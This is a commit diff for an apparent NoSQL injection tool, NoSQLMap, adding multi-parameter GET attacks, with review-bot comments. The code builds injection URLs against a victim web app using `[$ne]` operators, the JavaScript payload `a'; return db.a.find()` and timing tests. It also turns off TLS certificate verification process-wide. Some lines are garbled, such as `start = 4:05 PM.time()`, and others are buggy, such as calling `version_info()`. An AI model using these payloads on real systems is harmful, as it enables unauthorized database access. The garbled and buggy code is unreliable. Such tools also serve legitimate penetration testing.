

Features and Bugfixes
Add multi-parameter GET attacks. Fix a couple of bugs around URL
generation.
tcstool authored and tcstool committed Jun 26, 2016
1 parent 807a58c commit 6811590
Showing 2 changed files with 70 additions and 40 deletions.
16 changes: 11 additions & 5 deletions nosqlmap.py
Expand Up @@ -55,7 +55,13 @@ def mainMenu():
global victim
global dbPort
global myIP
global myPort
global webPort
global uri
global httpMethod
global https
global verb
global requestHeaders
global postData

mmSelect = True
while mmSelect:
Expand Down Expand Up @@ -100,10 +106,10 @@ def mainMenu():
#Check minimum required options
if (optionSet[0] == True) and (optionSet[2] == True):
if httpMethod == "GET":
nsmweb.getApps()
nsmweb.getApps(webPort,victim,uri,https,verb,requestHeaders)

else:
nsmweb.postApps()
elif httpMethod == "POST":
nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders)

else:
raw_input("Options not set! Check host and URI path. Press enter to continue...")
Expand All @@ -130,6 +136,7 @@ def platSel():
global dbPort
select = True
print "\n"

while select:
print "1-MongoDB"
print "2-CouchDB"
Expand All @@ -145,7 +152,6 @@ def platSel():
dbPort = 5984
return
else:
psel = True
raw_input("Invalid selection. Press enter to continue.")

def options():
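Review bot: The two calls added in the mainMenu hunk pass host and port in opposite positional orders — `nsmweb.getApps(webPort,victim,uri,https,verb,requestHeaders)` versus `nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders)` — and the signatures in nsmweb.py mirror that inconsistency, so a transposed pair would only surface as a failed request rather than at the call site. Aligning the two signatures, or calling with keywords, e.g. `nsmweb.getApps(webPort=webPort, victim=victim, uri=uri, https=https, verb=verb, requestHeaders=requestHeaders)`, removes the hazard. Replacing `else:` with `elif httpMethod == "POST":` also means any other value of httpMethod now falls through silently with no message; a trailing `else:` branch such as `raw_input("Unsupported HTTP method. Press enter to continue...")` would keep the menu behaviour explicit. mainMenu continues outside the hunk.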
94 changes: 59 additions & 35 deletions nsmweb.py
@@ -1,16 +1,30 @@
import httplib2
import urllib
import urllib2
import json
import string
import nsmmongo
from sys import version_info
import datetime
import itertools
import re
import time
import random

def getApps(victim,webPort,uri,https,verb):
def httpRequestor (httpReq):
#Need to determine version of Python that's running to figure out how to handle self-signed certs.
if version_info() >= (2,7,9):
import ssl
ssl._create_default_https_context = ssl._create_unverified_context






def getApps(webPort,victim,uri,https,verb,requestHeaders):
print "Web App Attacks (GET)"
print "==============="
paramName = []
global testNum
global httpMethod
httpMethod = "GET"
testNum = 1
paramValue = []
global vulnAddrs
Expand All @@ -19,6 +33,8 @@ def getApps(victim,webPort,uri,https,verb):
possAddrs = []
timeVulnsStr = []
timeVulnsInt = []
yes_tag = ['y', 'Y']
no_tag = ['n', 'N']
appUp = False
strTbAttack = False
intTbAttack = False
Expand All @@ -30,7 +46,6 @@ def getApps(victim,webPort,uri,https,verb):
str24 = False
global int24
int24 = False
global requestHeaders

#Verify app is working.
print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."
Expand Down Expand Up @@ -107,7 +122,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -125,7 +140,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -144,7 +159,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum +=1

else:
Expand All @@ -163,7 +178,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -180,7 +195,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum +=1

else:
Expand All @@ -198,7 +213,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -215,7 +230,7 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -233,18 +248,19 @@ def getApps(victim,webPort,uri,https,verb):

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1


doTimeAttack = raw_input("Start timing based tests (y/n)? ")

if doTimeAttack in yes_tag:
print "Starting Javascript string escape time based injection..."
req = urllib2.Request(uriArray[18], None, requestHeaders)
start = 4:05 PM.time()
start = time.time()
strTimeInj = urllib2.urlopen(req)
page = strTimeInj.read()
end = 4:05 PM.time()
end = time.time()
strTimeInj.close()
#print str(end)
#print str(start)
Expand Down Expand Up @@ -331,12 +347,14 @@ def getApps(victim,webPort,uri,https,verb):
raw_input("Press enter to continue...")
return()

def postApps():
def postApps(victim,webPort,uri,https,verb,postData,requestHeaders):
print "Web App Attacks (POST)"
print "==============="
paramName = []
paramValue = []
global vulnAddrs
global httpMethod
httpMethod = "POST"
vulnAddrs = []
global possAddrs
possAddrs = []
Expand All @@ -347,10 +365,8 @@ def postApps():
intTbAttack = False
trueStr = False
trueInt = False
global postData
global neDict
global gtDict
global requestHeaders
testNum = 1

#Verify app is working.
Expand Down Expand Up @@ -447,7 +463,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -474,7 +490,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

postData.update({injOpt:"a'; return db.a.find(); var dummy='!"})
Expand All @@ -491,7 +507,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -511,7 +527,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
else:
testNum += 1
Expand All @@ -532,7 +548,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -553,7 +569,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand All @@ -575,7 +591,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1
print "\n"
else:
Expand All @@ -595,7 +611,7 @@ def postApps():

if errorCheck == False:
injLen = int(len(urllib2.urlopen(req).read()))
checkResult(randLength,injLen,testNum)
checkResult(randLength,injLen,testNum,verb)
testNum += 1

else:
Expand Down Expand Up @@ -724,7 +740,7 @@ def errorTest (errorCheck,testNum):



def checkResult(baseSize,respSize,testNum):
def checkResult(baseSize,respSize,testNum,verb):
global vulnAddrs
global possAddrs
global lt24
Expand Down Expand Up @@ -834,7 +850,7 @@ def buildUri(origUri, randValue):
paramValue = []
global uriArray
uriArray = ["","","","","","","","","","","","","","","","","","",""]
injOpt = ""
injOpt = []

#Split the string between the path and parameters, and then split each parameter
try:
Expand All @@ -857,11 +873,17 @@ def buildUri(origUri, randValue):
menuItem += 1

try:
injIndex = raw_input("Which parameter should we inject? ")
injOpt = str(paramName[int(injIndex)-1])
print "Injecting the " + injOpt + " parameter..."
injIndex = raw_input("Enter parameters to inject in a comma separated list: ")

except:
for params in injIndex.split(","):
injOpt.append(paramName[int(params)-1])

#injOpt = str(paramName[int(injIndex)-1])

for params in injOpt:
print "Injecting the " + params + " parameter..."

except Exception:
raw_input("Something went wrong. Press enter to return to the main menu...")
return

Expand All @@ -887,7 +909,8 @@ def buildUri(origUri, randValue):
uriArray[18] = split_uri[0] + "?"

for item in paramName:
if paramName[x] == injOpt:

if paramName[x] in injOpt:
uriArray[0] += paramName[x] + "=" + randValue + "&"
uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
Expand Down Expand Up @@ -933,14 +956,15 @@ def buildUri(origUri, randValue):

#Clip the extra & off the end of the URL
x = 0
while x <= 17:
while x <= 18:
uriArray[x]= uriArray[x][:-1]
x += 1

return uriArray[0]

def getDBInfo():
curLen = 0
yes_tag = ['y', 'Y']
nameLen = 0
gotFullDb = False
gotNameLen = False
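Review bot: The new `httpRequestor` helper in the first nsmweb.py hunk calls `version_info()`, but `sys.version_info` is a tuple-like object and not callable, so the comparison raises TypeError the first time the function runs; it should read `if version_info >= (2,7,9):`. The `httpReq` parameter is never used and the function returns nothing, and within the hunks shown nothing calls it, so either the call sites are outside this diff or the helper is dead — worth confirming. Assigning `ssl._create_default_https_context = ssl._create_unverified_context` also rewrites a private attribute and relaxes certificate verification for every HTTPS request in the process rather than only the scan target; building one `ssl.SSLContext` and passing it via the `context=` argument of `urllib2.urlopen` (available from 2.7.9, the version the check already gates on) would keep the effect scoped. A docstring such as `"""Relax TLS verification for self-signed target certificates (Python >= 2.7.9)."""` would make the intent explicit.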
